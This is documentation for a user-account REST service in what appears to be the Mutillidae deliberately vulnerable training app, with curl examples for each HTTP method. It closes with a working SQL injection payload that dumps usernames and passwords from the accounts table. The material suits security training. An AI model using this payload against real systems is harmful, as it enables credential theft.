User Account Web Service Documentation

Welcome to the User Account Web Service

This service allows you to create, read, update, and delete user accounts using various HTTP methods.

Note: This service is vulnerable to SQL injection at security level 0. Be cautious when testing or exploring its functionality.

Supported HTTP Methods

1. GET (Retrieve Data)

Use GET requests to retrieve information about one or more accounts.

Optional Parameter: username (as a URL parameter)

If username=*, all accounts will be returned.
If username is specified, details for that user will be returned.

Examples:

Retrieve a specific user:

GET /webservices/rest/ws-user-account.php?username=adrian HTTP/1.1
Host: mutillidae.localhost
Accept: application/json

cURL Example:

curl -X GET "http://mutillidae.localhost/webservices/rest/ws-user-account.php?username=adrian" \
  -H "Accept: application/json"

Retrieve all users:

GET /webservices/rest/ws-user-account.php?username=* HTTP/1.1
Host: mutillidae.localhost
Accept: application/json

cURL Example:

curl -X GET "http://mutillidae.localhost/webservices/rest/ws-user-account.php?username=*" \
  -H "Accept: application/json"

2. POST (Create New Account)

Use POST requests to create a new user account.

Required Parameters (POST body):

username: The username for the new account
password: The password for the new account
firstname: User's first name
lastname: User's last name

Optional Parameter: signature (User's signature)

Example:

POST /webservices/rest/ws-user-account.php HTTP/1.1
Host: mutillidae.localhost
Content-Type: application/x-www-form-urlencoded

username=john&password=pass123&firstname=John&lastname=Doe&signature=JDoe

cURL Example:

curl -X POST "http://mutillidae.localhost/webservices/rest/ws-user-account.php" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "username=john&password=pass123&firstname=John&lastname=Doe&signature=JDoe"

3. PUT (Create or Update Account)

Use PUT requests to create or update an existing user account.

Required Parameters (POST body):

username: The username for the account
password: The password for the account
firstname: User's first name
lastname: User's last name

Optional Parameters:

signature: User's signature
update_client_id (boolean): If true, updates the client_id
update_client_secret (boolean): If true, updates the client_secret

Example:

PUT /webservices/rest/ws-user-account.php HTTP/1.1
Host: mutillidae.localhost
Content-Type: application/x-www-form-urlencoded

username=john&password=newpass123&firstname=John&lastname=Doe&signature=JDoeUpdated&update_client_id=true&update_client_secret=false

cURL Example:

curl -X PUT "http://mutillidae.localhost/webservices/rest/ws-user-account.php" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "username=john&password=newpass123&firstname=John&lastname=Doe&signature=JDoeUpdated&update_client_id=true&update_client_secret=false"

4. DELETE (Remove Account)

Use DELETE requests to delete an existing user account.

Required Parameters (POST body):

username: The username of the account to be deleted
password: The password for the account

Example:

DELETE /webservices/rest/ws-user-account.php HTTP/1.1
Host: mutillidae.localhost
Content-Type: application/x-www-form-urlencoded

username=john&password=newpass123

cURL Example:

curl -X DELETE "http://mutillidae.localhost/webservices/rest/ws-user-account.php" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "username=john&password=newpass123"

Example Exploits (SQL Injection)

This service is vulnerable to SQL injection at security level 0. Example:

GET /webservices/rest/ws-user-account.php?username=jeremy'+union+select+concat('The+password+for+',username,'+is+',password),mysignature+from+accounts+-- HTTP/1.1
Host: mutillidae.localhost